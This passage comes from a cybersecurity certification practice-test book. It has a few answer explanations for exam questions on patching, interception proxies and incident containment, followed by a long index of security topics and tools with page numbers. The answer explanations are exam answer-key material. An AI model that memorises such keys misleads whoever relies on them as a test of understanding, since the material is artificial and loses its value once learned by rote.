ing process. This is a medium severity vulnerability, so there is no need to apply the patch 
in an emergency fashion that would bypass change management. Similarly, shutting down 
the server would cause a serious disruption and the level of severity does not justify that. 
Finally, there is no need to rerun the scan because there is no indication that it is a false 
positive result. 
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A. Carla is looking for a tool from a category known as interception proxies. They run 
on the tester’s system and intercept requests being sent from the web browser to the 

web server before they are released onto the network. This allows the tester to manually 
manipulate the request to attempt the injection of an attack. Burp, ZAP, and Tamper Data 
are all examples of interception proxies. Nessus is a vulnerability scanner and, while 
useful in penetration testing, does not serve as an interception proxy. 


C. Alex needs to quickly move into containment mode by limiting the impact of the 
compromise. He can then gather the evidence and data needed to support the incident 
response effort, allowing him to work with his organization’s desktop and IT support 
teams to return the organization to normal function. 
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forensic information, 359 
timestamps, 371 
updates, 336 
CIFS files, 113 
ciphers 
OpenSSL and, 206 
support, 332 
CIS (Center for Internet Security), 393 
Cisco, NGFW, 378 
Cisco routers 
audits, 7 
lockdown, documentation, 61 
ClearCase, denial-of-service attacks, 106 
CLOSE_WAIT status message, 383 
Cloudflare, 321, 391 
CNAME (canonical name), 325 
COBIT standard, 202, 380, 384 
assessment tools, 212 
code analysis, 370 
static, 386 
code review, 233 
security review and, 195 
code testing, 331 
collisions, 351 
command history, 44, 181 


command prompt, 372 
command-line, server access allowed, 40 
Common Platform Enumeration data, 311 
CompTIA website, ping command, 223 
Computer Security Incident Handling Guide, 
366 
Confidential, US classification level, 381 
confidentiality, 318 
configuration management agent, 87 
connection status, 209 
containerization, 344 
containment, 158, 184, 365, 372, 375 
context-based authentication, 241, 394, 
395 
continuous monitoring, 127, 350 
control reviews, 15 
controls, 237 
logical, 389 
physical, 201, 236, 389, 392 
responsibility continuity, 211 
cookies, 205, 333, 381 
COPE (corporate-owned, personally 
enabled) strategy, 347 
copyrights, 169, 367 
corporate policy compliance, 348 
CPE (Common Platform Enumeration), 331, 
337, 340, 350, 381 
CPU use, 152 
tools, 54 
crash carts, 370 
credentialed scans, 132, 345, 349 
authenticated scans, 351 
credit card information, 79-80, 87, 103, 
112, 331, 352 
disclosures, 142 
regulatory regime, 66 
credit cards, processing, 354 
cross-site request forgery, 349 
cross-site scripting, 126, 129, 335, 349, 382 
cross-training, 393 
cryptocurrency, 377 
mining software, 248-249 
cryptographic erase, 355 
cryptographics, RADIUS and, 247 


cryptography 
birthday attacks, 132-133 
nonrepudiation, 388 
symmetric, 383 
tools, 241 
cryptosystems, asymmetric, 222-223 
CySA+ exam, 369 
CSI (continual service improvement), 391 
CSIRT (Computer Security Incident 
Response Team), 366 
leaders, 358 
policies, 185 
Cuckoo, 373 
CVE (Common Vulnerabilities and 
Exposures), 331, 337, 340, 350, 381 
CVSS (Common Vulnerability Scoring 
System), 331, 337, 340 
A:N string, 352 
availability risk (A:N), 338 
confidentiality risk (C:N), 338 
I:N string, 352 
integrity risk (I:P), 338 
vectors 
AC:L, 352 
Au:N, 352 
AV:N, 351 
C:P, 352 
cyber incident response 
answers, 353-377 
review, 140-192 
cybersecurity 
availability, 318 
confidentiality, 318 
financial institutions, 379 
integrity, 318 
ISO standards, 379 


D 


data architecture, 386 

data carving, 357 

data classification, 338 
policies, 384, 388 
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data encoding, 379 
data exfiltration, 22, 321 
data ownership policies, 224, 384, 388 
data privacy, 338 
data remnance, 338 
data retention, 338 
databases, 121-122 
access restriction, 83 
server location, 198 
server logs, 340 
SQL injection attack, 200 
vulnerabilities, 79 
DCs (domain controllers), 384 
DDoS attacks, 23, 209 
DDoS mitigation technologies, 316 
debit card information, 331 
decomposition, malware, 326 
decomposition diagram, 311 
decryption, private key, 388 
defense-in-depth approach, 241 
degaussing, 161, 362 
denial-of-service attacks, 106, 122, 329, 
335 
LOIC (Low Orbit Ion Cannon), 53 
DEP (Data Execution Protection), 360, 389 
deprovisioning, automated, user account 
removal and, 382 
DES (Data Encryption Standard) algorithm, 
337, 381 
detection 
alerts, 12 
methods, malware, 2 
phase, logs, 372 
detective control review, 15 
deterministic sampling, 318 
development environment, 386 
device isolation, 361 
devices, tamper-proof seals, 372 
df command, 147 
dig command, 324, 385 
DNS poisoning, 215 
digital certificates 
public keys, 383 
signing, 383 
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digital signatures, 210 
asymmetric cryptosystems, 222-223 
private keys, 388 
directory permissions, 140 
directory services, 218-219 
disabled accounts, 328 
disallowed mode, 321 
discovery and attack phase, 20 
discovery and reporting phase, 20 
discretionary access control system, 32 
DiskView, 374 
disposition, SDLC phase, 378 
DMEA (Defense Microelectronics Activity), 
326 
DMZ 
establishing, 6 
vulnerability scans, 102 
DNS 
blackholing, 323 
brute-force attack, 308 
harvesting techniques, 35 
Passive assessment, 36 
poisoning, 330 
dig command, 215 
response validation, 44 
reverse lookup, 2, 308 
servers, digital signatures, 323 
WHOIS, 318 
wrong IP address response, 60 
DNS network, fast flux, 6 
DNSSEC, 323 
documentation, 48, 362 
chain of custody, 168, 183 
Cisco lockdown, 61 
documents, scanning setting conflicts, 
125 
DoD Trusted Foundry program, 310 
domains 
harvesting, 317 
registration, 312 
registration information, 329 
secure registration, 310 
DoS attacks, 329 
internal user to third party, 219 


drives 
leased, 357 
purges, 143 
DROP command, 312 
DRPs (disaster recovery plans), 346 
dual authentication, 394 
dual control, 205, 209, 221, 382-385, 393 
DV certificates, 316 
dynamic analysis, 176 


ECC (Elliptic Curve Cryptosystem) 
algorithm, 381 
economic impact, calculating, 372 
e-discovery, 376 
deleted information, 190 
EDRM flow, 190 
time spent, 190 
editing tools, built-in, 316 
EDRM flow, 190 
EIGRP (Enhanced Interior Gateway Routing 
Protocol), 343 
email, 41 
address gathering, 36 
blacklisted, 161 
brute force, 27 
data dump, 56 
domain harvesting, 27 
domain probe, 27 
email list builder, 27 
registration services, 312 
spam, 14, 312, 363 
headers, 168, 366 
embezzling investigation, 199 
emergency change procedure, 345 
EMET (Enhanced Mitigation Experience 
Toolkit), 224 
EnCase, 388, 389 
encryption, 18, 334 
BitLocker decryption key, 173 
drive images, 355 


full-disk, 312, 380 
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keys, 211, 312 
macOS FileVault 2, 142 
public keys, 388 
endpoint forensics, 368 
endpoint security suite, 245 
enterprise architecture, business strategy 
and, 385 
EOL (end-of-life), 345 
ephemeral key, 383 
equipment, incident response, 178 
eradication phase, 355, 372 
Eraser tool, 149, 357, 369 
ERP (enterprise resource planning) software, 
14, 212 
error messages, 231 
ESP packets, 313 
ESP protocol, 16 
ESTABLISHED status message, 383 
Ettercap, 325 
EV (Extended Validation) certificate, 316 
event classification, 141 
evidence 
authentication, 205 
chain of custody, 359, 363 
gathering, 226 
labeling, 152 
log creation, 171 
physical location, 159 
preservation, 174 
evil twins, 364 
detecting, 164 
wireless attacks, 372 
exfiltration prevention, 202 
exiftool, 140, 178, 314 
expired certificates, 324 
exploitation, 308 
Metasploit, 326 
external audit, 378 
externally accessible information review, 52 


E 


Fagan inspection, 391 
fail2ban, 325 


false positive reports, 339 
fast flux DNS network, 6 
FAT16, 363 
FAT32, 363 
fault injection, 395 
FERPA (Family Educational Rights and 
Privacy Act), 331, 379, 384 
fgdump, 46, 324 
File System audit, 370 
files 
change monitoring, 16 
disk space versus file size, 170 
recovering, slack space, 149 
validation, 140 
FileVault, 354 
filtered system, 60 
filters, INPUT, 309 
fingerprinting, 310, 340 
passive, 327 
preventing, 53 
FireEye, 391 
firewalls, 60, 318 
CheckPoint, 378 
DNS responses, malicious domains, 
58 
dual, 198, 378 
evasion, 324 
inbound traffic denied, 21 
iptables-based, 3, 14 
logs, 395 
LOIC (Low Orbit Ion Cannon), 53 
NGFW, 378 
rulebase, 208 
selecting, 198 
social engineering and, 381 
stateful packet inspection, 51, 326 
topology gathering reconnaissance 
prevention, 29 
vendors, 232 
web applications, 232, 249 
first-responder kits, 370 
FISMA (Federal Information Security 
Management Act), 350 
compliance, 130 
incident reporting, 180, 371 
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flow logs, 360 
Follow option, 379 
footprints, 16 
forensic kit, 376 
included items, 191 
preparation, 191 
forensics 
BitLock-encrypted drive copy, 187 
cable labeling, 148 
chain of custody form, 162 
Chrome, 179 
logs access, 154 
civil cases, 363 
data capture, order of volatility, 166 
data extraction levels, 188 
device isolation, 361 
e-discovery, 363 
EnCase, 388, 389 
endpoint, 368 
Eraser tool, 149 
evidence 
gathering, 226 
preservation, 174 
producing, 162 
forms, 145 
FTK, 388, 389 
Helix, 388, 389 
images 
duplicate, 167 
failure, 183 
hard drive format, 149 
live, 176 
network share, 166 
third-parties, 165 
incognito downloads, 158 
iPhone, 188 
backup, 168 
law enforcement seizure, 165 
Linux backdoor account, 174 
live imaging, 369 
live information, 363 
MDS and, 366 
memory forensics, 164 
mobile devices, 158, 220 


open source suite, 221 

original downloaded files, 173 

outside parties, 365 

password recovery, 147 

PC removal, 162 

photos, 178 

postmortem, 369 

power cable pull, 188 

retention policies, 365 

SANS SIFT tool, 167 

sending images, 144 

SHA-1 and, 366 

SHA-2 and, 366 

software-based shutdown, 188 

unexpected output, 192 

USB drives, 166 

virtual machines, 154 

capture, 148 

Windows 10 system usage, 188 

Windows Quick Format, 157 

witnesses, 367 

Word files unreadable, 180 
formal code reviews, 233, 377 
format string attacks, 359 
FortiWeb, 391 
Framework Core, 391 
Framework Implementation Tiers, 391 
Framework Profiles, 391 
FTK (Forensic Toolkit), 388, 389, 391 

FTK Imager Lite, 359, 370 
FTP (file transfer protocol) 

securing, 20 

security, 346 
full-disk encryption, 312, 380 
fuzz testing, 203, 250, 380, 386, 395, 398 
fuzzers, 387 


G 


games, preventing, 40 

GET, 321 

GLBA (Gramm-Leach-Bliley Act), 379, 384 
Google dorks, 24, 313, 317 


Google queries, 15 

governance, 385 

government classification levels, 381 

GPOs (Group Policy objects), 384 

GPS systems, location data, 362 

GraphDisk, 374 

green team, 5 

guest operating systems, 345 
attacks, 64 


hard drives, sanitizing, 149 
hardening. See system hardening 
hardware 

naming, 18 

write blocker, 355 
harvesting, anti-harvesting techniques, 48 
Hashcat, 358 
hashes, 313 

collisions, 350 
hashing, 18, 30, 317 
hashing malware packages, 28 
headers, spam, 366 
Helix, 388, 389 
heuristic analysis, 40, 370 
heuristic-based detection, 2, 308 
HFS+ format, 363 
hibernation files, 368 
High Severity Report, 66, 331, 350 
highest-severity vulnerabilities, 347 
HIPAA (Health Insurance Portability and 

Accountability Act), 180, 196, 213, 331, 
379, 384 

HIPS, 312 
honeynet, 49, 325, 353 

threats, 5 
honeypots, 49, 353 
host information, 46 
host-based solutions, 312 
hosts, file analysis, automated, 48 
htop command, 54, 327 
HTTP, IPS rules for filtering, 334 
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HTTP proxy, nmap, 311 
HTTPS, TLS encryption, 315 
hypervisor, 345 


IaaS (infrastructure as a service), 13, 382, 398 
ICMP Echo Reply packet, 377 
ICS (industrial control system), 332 
ICs (integrated circuits), 310 
ID badges, 386 
IDaaS (identity management) services, 398 
identification phase, 376 
identities, AAA framework, 397 
identity management infrastructure, 202, 
216, 223-224, 231, 239 
OAuth framework, 236 
IDP (identity provider), 378 
IDS logs, 340, 382 
ifconfig, 39, 162, 233, 388 
IIS (Internet Information Server), 
vulnerabilities, 334 
images 
duplicates, 167 
exiftool, 178, 179 
fiber links, 374 
forensics 
failure, 183 
hard drive format, 149 
network share, 166 
FTK Imager Lite, 370 
live, 176 
metadata, 186 
reverse image search tools, 374 
specific files, 152 
third-parties, 165 
write issues, 154 
impersonation attacks, 356 
Imperva, 398 
improper usage, 356 
incident data retention, 165, 170 
incident phase, 355 
analysis practices, 163 


428 incident response — John the Ripper 


incident response 
analysis, 189 
attacker identification, 167 
communications, 155, 360 
containment phase, 188, 365, 375 
economic impact, 182 
equipment, 178 
follow-up activity, 166 
improvements, 146 
lessons-learned review, 159, 356 
management and, 163, 364 
network cable disconnect, 166 
outside parties, communication, 166 
phases, 164 
playbooks, 373 
post incident communication, 191, 376 
proprietary information changes, 174 
recovery process, 169 
recovery time, 158 
resuming network access, 157 
states, 183 
third-party providers, 362 
tools, 191 
zero-day threats, 159 
incidents 
classification, 159 
potential, 159 
incognito, download detection, 158 
indicators of incidents, 361 
Info level vulnerability, 341 
information gathering, 16, 57 
information impact analysis, 375 
information security policy, 185, 206 
reviews, 201 
infrastructure-as-a-service, 322 
INPUT, filters, 309 
input validation, 344, 379 
integrity 
cybersecurity and, 318 
loss, 369 
intellectual property, 176, 367 
interception proxy, 219 
internal audit, 378 
Internet Explorer, 342 


intrusion detection, 379 
open source, 212 
intrusion detection and prevention systems, 383 
intrusion detection and protection, 384 
intrusion prevention, 209, 380 
IP addresses 
changing, 43 
external sources, 113 
locating for scan, 28-29 
off-site connection and transfer, 157 
IP reputation, 360 
iperf, 359 
iPhone, backups, 366 
IPS (intrusion prevention systems), 397 
alerts 
firewall rules and, 382 
port scans and, 382 
vulnerability scans and, 382 
IPSEC, ESP packets, 313 
IPsec, VPN links, 335 
iptables, 14, 47, 324, 388 
iptables-based firewalls, 3 
DROP command, 312 
IPv6 address records, 320 
IR life cycle, 364 
IRC, TCP ports, 321 
ISACs (Information Sharing and Analysis 
Centers), 366 
ISO 27001, 379 
organizations requiring, 235 
ISO standards, 201 
IT manager, roles, 149 
ITIL framework, 200, 379 
CSI (continual service improvement), 391 
IV certificates, 316 


J 


john process, 191 

John the Ripper, 147, 242, 353, 358, 376, 396 
incremental mode, 356 
Linus passwords, 140 
single crack mode, 356 


JRE, 340 

jump box, 309, 324, 332 
jump host, 309 

jump kits, 370 

jump server, 324 
Juniper, 391 


K 


kaizen continuous improvement approach, 
240, 394 

Kali Linux, 324 

Kerberos, 323, 385, 394 

kernel-mode drivers, 336 

kill command, 327 


L 


labeling evidence, 152 
LACNIC, 319 
LANMAN hashes, 314 
laptops, 64, 69 
LAST_ACK status message, 383 
latency, 11, 311, 319 
law enforcement seizure of hardware, 165 
LDAP (Lightweight Directory Access 
Protocol), 320, 380 
harvest prevention, 57 
injection attacks, 387 
node types, 222 
Lean Six Sigma, 397 
leased drives, 357 
least privilege, 205, 382-383, 393 
legal agreements, 120 
lessons-learned review, 159, 356, 361 
level-based access control, 32, 319 
link failure, 22, 360 
Linux 
active network connections, 221 
authentication logs, 243 
auth.log file, 49 
backdoor account, 174 
backup and restore commands, 354 
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buffer overflow attacks, 150 
df command, 147 
echo command, 38 
executable modification, static libraries, 151 
file command, 358 
file information, 17 
getfacl command, 354 
$HOME/ssh folder, 186 
ifconfig command, 360 
ip link show command, 360 
Kali, 324 
kill command, 327 
netstat -i command, 360 
network interface list, 156 
open files, 56 
passwords, John the Ripper, 140 
permissions, 147 

backups, 142 
rogue services, 44 
root account, 177 
runas command equivalent, 95 
sending events, 182 
setfacl command, 354 
user accounts 

age, 176, 369 

information, 322 

setup, 167 


listening ports, 319 

LISTENING status message, 383 
load balancers, aliasing and, 322 
load testing, 383, 384 

location data, 362 

logging, 379 


standardizing, 246 


logical controls, 389 
login 


blocking, 309 
failure, enabling, 369 
interactive, 341 

user ID and, 5 


logs, 340 


Apache server, 24 
searching, 234 
web server, 24 
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LOIC (Low Orbit Ion Cannon), 53, 327 
ls command, output, 20 
lsof command, 146, 328, 356 


MAC addresses 
allowed devices, 360 
changing, 321 
vendor prefixes, 312 
Macintosh, monitoring, 173 
macOS 
configuration settings, 165 
drive format, 357 
FileVault 2 encryption, 142 
high memory use, 181 
memory pressure, 371 
mail servers 
clusters, 311 
vulnerability report, 83 
malfeasance detection, 213 
Maltego, 326 
malware 
air gaps, 160 
analysis, 11, 13, 183 
base64 encoding, 329 
beaconing behavior, 143 
BIOS-resident packages, 367 
checking for, 185 
decomposition, 326 
detection methods, 2 
distribution, connection prevention, 45 
eradication, 169 
fast flux DNS network, 6 
hashing malware packages, 28 
heuristic-based detection methods, 308 
hosts file changes, 18, 313 
malwr.com, 54 
MBR-resident packages, 367 
naming, 368 
obfuscated code, 58 
package components, 51 
package detection, 34 


UEFl-resident packages, 367 

user input, 172 
malwr.com, 55 
mandatory access control, 32, 319 
mandatory vacations, 205 
man-in-the-middle attacks, 247, 356 
mapping, passive, network topology, 36 
MBSA (Microsoft Baseline Security 

Analyzer), 308, 371, 387, 397 

passwords, 57-68 
MD2 algorithm, 350 
MD4 algorithm, 350 
MDS algorithm, 350 

checksum validation, 155 
MDM (mobile device management), 347 
media sanitization, 362 

degaussing, 161 

descriptions, 160 

hard drives, 149 

techniques, 157 

validation, 160 

volatility, 371 
memory 

DEP, 372 

forensics, 164 

imaging, 357 

pressure, 371 

Process Explorer, 195 

usage monitoring, 359 
MemShuffle, 360 


message rejection errors, domain harvesting 


and, 317 
messages 
CLOSE_WAIT, 383 
ESTABLISHED, 383 
LAST_ACK, 383 
LISTENING, 383 
messaging, secure, 148 
metadata, 186 
photos, 21, 140, 353 
MetaScan, 374 
Metasploit, 308, 326, 343 
microSD cards, digital camera filesystem 
type, 161 
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Microsoft SQL, ports, 308 

Minibis, 373 

mobile devices, 120 
forensics, 158, 220 
isolation, 158 

ModSecurity, 387, 398 


MOUs (memorandums of understanding), 


346, 347 


MRTG (Multi Router Traffic Grabber), 397 
MSSPs (managed security service providers), 


382 


multifactor authentication, 197, 214, 217, 


238, 320, 381 
mutation testing, 395 
MX records, 325 
MxToolbox MX Lookup tool, 10 
MySQL, 24, 316 
ports, 308 


NAC solutions, 55, 328 
Nagios, 397 
logs, error message, 148 
National Cyber Security Authority, 371 
National Cyber Security Centre, 371 
National Software Reference Library, 
319 
system binary kits, 367 
NAXSI, 391, 398 
nbtstat -c, 9, 310 
nbtstat -s, 314 
Nessus, 308, 326, 343, 348 
net config command, 21 
net group command, 21 
net use command, 21, 315 
net user command, 21, 315 
NetBIOS 
name conflict vulnerability, 90 
session detection, 19 
session status, 314 
netcat, 15, 310, 313, 320 
netcate, as listener, 317 


NetFlow, 241, 395 
netflow collectors, 30 
netflow logs, 340, 355 
netstat, 7, 209, 214, 310, 385 
flags, 187 
listening ports, 319 
output, 46 
netstat -at, 175 
network flows, 315 
central file server, 40 
logs, 59 
Network General, 398 
Network Miner, 14 
network segmentation, 344, 
377 
network shares, listing, 315 
network topology maps, 15 
NetworkMiner, 325 
Nikto scan, 328, 397 
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NIST (National Institute of Standards and 


Technology) 
adverse events, 362 
backups, 364 


Computer Security Incident Handling 


Guide, 366 
Cybersecurity Framework, 387 
templates, 233 
tiers, 219 
deprecated authentication factors, 
236 
Guide to Cyber Threat Information 
Sharing, 153 
integrity loss, 369 
IR life cycle, 364 
media sanitization, 362 
outside party designation, 365 
recoverability effort categories, 
361 
SP800-61, incident categories, 361 
SP800-115 process flow, penetration 
testing, 4, 310 
Special Publication 800-63-3, 392 
threat categories, 58 
validations, 372 
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nmap, 7, 8, 308, 310, 313, 375 
-0 flag output, 9 
anti-firewall capabilities, 329 
Common Platform Enumeration data, 
311, 314 
cpe:/o entry, 45 
fingerprinting, 310 
firewall evasion, 324 
hardware naming, 18 
hops, 317 
HTTP proxy, 311 
network path distance, 25 
port scanned, 204 
printer identification, 42 
scan type, 7 
scans, 42, 50 
firewalled subnet, 46 
ping-through, 10 
proxy, 10 
randomized host, 10 
reflection, 10 
shell account, 56 
software naming, 18 
-sU flag, 323 
nmap -sP, 326 
nmap -T, 39, 321 
nondisclosure agreements, 201 
nonrepudiation, 388 
notifications, 311 
nslookup command, 248 
NTLM (NT LAN Manager), 380 
NTP (Network Time Protocol), 335 
NX bit, mapped memory regions and, 358 


O 


OAuth, 236, 378, 385, 392, 394 
redirect attack, 197 
OEM documentation, 330 
OpenID, 394 
OpenSSL, 338, 395 
ciphers, 206 
OpenVAS, 375, 397 


operational control review, 15 
operations guides, 373 
Ophcrack, 358 
Oracle 
ports, 308 
TCP ports, 321 
Oracle Database TNS Listener Poison Attack 
vulnerability, 347 
organizations, 167 
Orizon, 236 
OS rules, clients, 55 
OSINT (open source intelligence), 21, 315 
social media profiles, 25 
OSSEC SIEM logs, 163 
OSSIM, 386 
OUs (organizational units), 384 
outside parties, 365 
OV certifications, 316 
OVAL (Open Vulnerability and Assessment 
Language), 331, 340 
over-the-shoulder reviews, 391 
overwriting, 355, 368 
OWASP (Open Web Application Security 
Project), 381, 386 
Orizon, 236 
security controls list, 246 
SQL injection attacks, 200 


P 


PaaS (platform as a service), 382, 398 
packets, 213 
capture, 60 
outbound, 368 
sniffing, 355 
page file, 364 
pair programming, 377, 391 
Palo Alto, 391 
NGFYW, 378 
PAM (pluggable authentication module), 
325, 367 
pass-around reviews, 377, 391 
passcodes to SMS, 395 
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passive fingerprinting, 327 Windows 10 systems, 179 
passive footprinting, 9 zero-day threats, 361 
passive network mapping, 320 patents, 169, 367 
passive network monitoring, 348 peap file, traffic, 33 
passphrases, 374 PCI DSS (Payment Card Industry Data Security 
pass-the-hash attack, 18 Standard), 50, 112, 331, 332, 352, 381 
passwd binary, 314 compliance, 344 
password-based authentication, 238 password compliance, 204, 239 
passwords, 202, 315, 393 Peach Fuzzer, 250, 387 
captured, 36 penetration testing, 2, 4 
data dump, 56 attackers, 5 
disabled accounts, 328 discovery and attack phase, 20 
expiration policy, 378 discovery and reporting phase, 20 
exposed, 3 netcat, 15 
forensics, 147 NIST SP800-115 process, 310 
hashing, 18, 308 planning and attack phase, 20 
John the Ripper, 353, 376, 396 planning and discovery phase, 20 
Linux, 140 rules of engagement, 37, 325 
knowledge-based factors, 378 shunning and, 315 
MBSA and, 57 social media, 7 
PCI DSS compliance, 204, 239 Performance Monitor, 359 
policies, 197, 204, 211 permission for scans, 340 
recovery, 147, 168 permissions 
Windows 7 station, 180 change monitoring, 177 
SAM, 375 Linux, 147 
SASL, 387 backups, 142 
self-service reset, 242 Sysinternals, 140, 217 
SSHA storage, 395 PGP key servers, 2 
stolen, 36 PHI (protected health information), 180, 
storage schemes, 241 196, 384 
weak policies, 346 data elements, 371 
website pop-up messages, 207 phishing attacks, 35, 221, 376, 380 
Windows 7 system, 151 password-based authentication system, 238 
patch levels SAML phishing, 30 
assessing, 2 spear phishing, 30, 318 
MBSA, 308 tuna phishing, 30 
Patch Report, 331, 350 user training, 388 
patches, 120, 337 whaling, 30, 318 
best practices, 203 photographs 
change management and, 114 exiftool, 140, 178 
restarts, 316 location data, 362 
scheduling, 97 metadata, 21, 140, 186, 353 
test environment and, 240, 380 social media, 371 


virtualized systems, 71 phpinfo file, 349 
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physical controls, 201, 236, 389, 392 
physical hardware, 345 
physical security controls, 199 


PII (personally identifiable information), 363 


ping, 7 
ping sweep, 329 
PINs, 386, 393 
pivots, 321 
plain-text authentication, 96, 340 
planning and attack phase, 20 
planning and discovery phase, 20 
playbooks, 373 
PNG (Portable Networks Graphics), 337 
policies, 185 
account management, 384 
CSIRT (Computer Security Incident 
Response Team), 185 
data classification, 384 
data ownership, 224 
passwords, 197 
retention policies, 165 
policy violations, 141 
POODLE vulnerability, 336 
POP3 (Post Office Protocol v3), 339 
port scans, 32, 355 
detecting, 18 
detection, 314 
likelihood, 12 
nmap and, 204 
service provider infrastructure, 41 
services, 66-67 
vulnerabilities, 67 
ports 
3306, 2 
3389, 41 
8080, 41 
8443, 41 
externally initiated connections, 22 
HTTPS, 337 
listening, 319 
Microsoft SQL, 308, 337 
MySQL, 308 
open, 3 
Oracle, 308, 337 


Postgres, 308 
security filters, MAC addresses, 321 
web servers, 331 
POST, 321 
Postgres, 323 
ports, 308 
post-rebuild validation, 143 
PPTP (Point-to-Point Tunneling Protocol), 
VPN connections, 335 
Practice Exam 1, 252-275 
answers, 399-408 
Practice Exam 2, 278-305 
answers, 408-418 
precursors of incidents, 361 
preservation phase, 190 
preserving evidence, 174 
pretexting, 21, 30 
social engineering and, 315, 318 
printers 
nmap and, 42 
web servers and, 342 
priorities, 77 
private key 
decryption, 388 
digital signatures, 388 
privilege creep, 203, 380 
privilege escalation, 39, 126, 309, 311, 334 
privilege escalation attack, 370, 389 
privileges, 236 
Process Explorer (Sysinternals), 195 
Process Monitor, 364 
procurement, chain of custody, 7 
profiling, 21 
Proventia, 384 
proxychains, 328 
ps command, 340 
output, 19 
public key cryptography, 383, 388 
public records, 331 
purging, 355 
degaussing, 362 
drives, 143 
Windows systems, 176 
PuTTY, 343 


Q 


QRadar, 386 
Qualys vulnerability scanner, 397 
Qualys Patch Report, 66 
QualysGuard scanner, 109 
query parameterization, 379 
query strings, buffer overflow attack, 380 
Quick Format (Windows), 360 
quid pro quo, 30 


RAD (rapid application development) 
approach, 387 
RADIUS, 323, 385, 391, 394 
authentication protocol, 230-231 
cryptographics, 247 
rainbow tables, 328 
Ophcrack and, 358 
random sampling, 318 
ransomware, 50, 91 
backups and, 326, 339 
functional impact category, 182 
phishing message, 221 
rapid application development, 390 
Rational ClearCase Portscan Denial of 
Service vulnerability, 347 
RAW format, 363, 365 
RDP, service port, 322 
rebuilds, validation, 143 
reconnaissance efforts 
blue team, 38 
footprint, 8 
red team, 38 
rules of engagement, 2 
tools, 50 
recovery phase, 372 
Red Hat 
ownership changes, 158 
permission monitoring, 158 
updates, MySQL database, 346 
red team, 5, 11, 38, 309, 320, 323, 330 
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reformatting, 355 
regression testing, 394, 397 
regulated information breach, 320 
remote access approval, 197 
remote code execution attack, 348 
remote login, prevention, 4 
reports, 112 
High Severity Report, 331, 350 
Patch Report, 331, 350 
reviewing, 349 
system administrator, 54 
Technical Report, 331, 346, 
350 
Unknown Device Report, 331, 350 
vulnerability scanners, 66 
requests for exceptions, 212, 220, 384 
resource exhaustion attacks, 23 
Resource Manager, 359 
resource services, 392 
responsive control review, 15 
retention policies, 165, 229, 365, 367, 
390 
reviews, 391. See also control reviews 
RIPE, 319 
risk appetite/tolerance, 351 
rogue access points, 141 
rogue devices 
identifying, 146 
SolarWindws setup, 155 
role-based access control, 32, 
319 
root account, 26-27 
remote login prevention, 4 
rootkits, 398 
route poisoning, 323 
RP (relying party), 378 
RSA (Rivest-Shamir-Adelman) algorithm, 
381, 383 
rules of engagement, 45, 48, 325 
penetration testing, 323 
reconnaissance efforts, 2 
rulesets, 318 
runas command, 340 
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S 


SaaS (software as a service), 382 
port scans, 312 


SABSA (Sherwood Applied Business Security 


Architecture), 382, 386 
logical security architecture, 206 
physical security architecture layer, 217 
SAM, passwords, 375 
SAML authentication flow, 231 
user identity, 197 
SAML phishing, 30 
SAML-based authentication flow, 378, 391 
sandbox, 328 
change deployment, 353 
malware analysis, 373 
patch deployment, 347 
sanitizing media, 362 
degaussing, 161 
descriptions, 160 
hard drives, 149 
next step, 182 
techniques, 157 
validation, 160 
SANS SIFT tool, 167 
SASL, 387 
sc (service controller), 327, 329 
SCADA (supervisory control and data 
acquisition) system, 230, 327, 332 
scan types 
ASV (approved scanning vendor), 342 
local, 355 
nmap, 7 
scanner placement, 29 
scans 
authenticated, 351 
credentialed, 345, 349, 351 
frequency, 349 
IT staff, 351 
scheduled, 350 
sensitivity, 344 
SCAP (Security Content Automation 
Protocol), 65, 96, 129 
CCE (Common Configuration 
Enumeration), 88, 337, 350, 381 


CPE (Common Platform Enumeration), 
88, 331, 337, 340, 350, 381 
CVE (Common Vulnerabilities and 
Exposures), 88, 331, 337, 340, 350, 
381 
CVSS (Common Vulnerability Scoring 
System), 88, 331, 337-338, 340, 
351-352 
description language, 66 
scope worksheet, 59 
scoping, 309 
SDelete, 385 
SDLC best practices, 250 
SDLC phases, 199, 212 
disposition, 378 
searches, Google dorks, 313 
SECaaS (security as a service), 382, 
398 
secpol.msc, 174 
Secret, US classification levels, 381 
secure administrative host, 324 
secure messaging, 148 
secure zone, establishing, 6 
security, obscurity and, 397 
security architecture review, 
193-250 
answers, 377-399 
security artifacts, 384 
security incidents, 141, 354 
security policies 
exception requests, 212, 220, 384 
reviews, 382 
security priorities, 77 
security reviews, code reviews and, 
195 
segmentation, 140, 228 
self-signed certificates, 21, 315 
sensor network, vulnerabilities, 71 
separation of duties, 205, 213, 221, 
381-384, 387, 393 
privilege creep, 380 
server-based scanning, 348 
servers 
as data repository point, 177 
as egress point, 177 


service design, 379 
service ports 
8080, 322 
8443, 322 
service validation, telnet and, 316 
services 
command-line control, 327 
shutting down, 59 
session hijacking, 380 
session key, 383 
setupapi file, 373 
SHA-1 algorithm, 350 
SHA-256 algorithm, 350 
shadow copies, 23, 161 
disabling, 363 
SharePoint, 332 
vulnerabilities and, 70-71 
shasum utility, 237, 246 
shell account, nmap scans, 56 
Shodan scan data, 53 


Shodan searches, 2, 8, 16, 312, 313 


shunning, 22, 315 


SIEM (security information and event 
management), 12; 27, 196, 311, 315, 


382, 392 
forensic analysis and, 317 
new user, 163 
open source, 216 
OSSIM, 386 
port scan detection, 18 
Signal protocol, 357 
signature-based detection, 2 
hashing and, 317 
sinkholing, 328 
site-to-site VPNs, 239 
Six Sigma, 397 
slack space, 364, 374 
Windows partitions, 164 


SLAs (service level agreements), 346, 347 


slow downs, 177 

SMS 
authentication, 392 
deprecating, 393 
passcodes, 395 
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SMTP (Simple Mail Transfer Protocol), 343 
validating, 24 
sniffing tools, 320 
SNMP (Simple Network Management), 331, 
343, 355 
outdated versions, 336 
snmpwalk command, 173, 368 
Snort, 383 
Snort IDS, 384 
SOA (Start of Authority), 325 
SOC (Service Organization Control) audits, 
12.343 
incident response and, 362 
social engineering, 35, 204, 226, 380 
baiting, 30 
firewalls and, 381 
pretexting, 30 
pretexting and, 315, 318 
quid pro quo, 30 
whaling, 30 
social media 
penetration testing, 7 
profile identification, 25 
profiling, 35, 320 
Social Security number breaches, 35, 320 
software 
changes, 192 
development methodology, 220, 225, 230 
naming, 18 
SolarWinds Network Mapper, 153, 313, 362 
rogue devices, 155 
Source-fire, 383, 384 
SOX (Sarbanes-Oxley) Act, 331, 379, 384 
SP (service providers), 378, 388 
spam, 14 
headers, 168, 366 
spoofs and, 363 
spear phishing, 30, 318 
special characters, 237 
SPF records, 325 
Splunk, 392 
spoofing, 356 
preventing, 49 
sprints, agile method, 389 
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SQL 
blind injection vulnerabilities, 333 
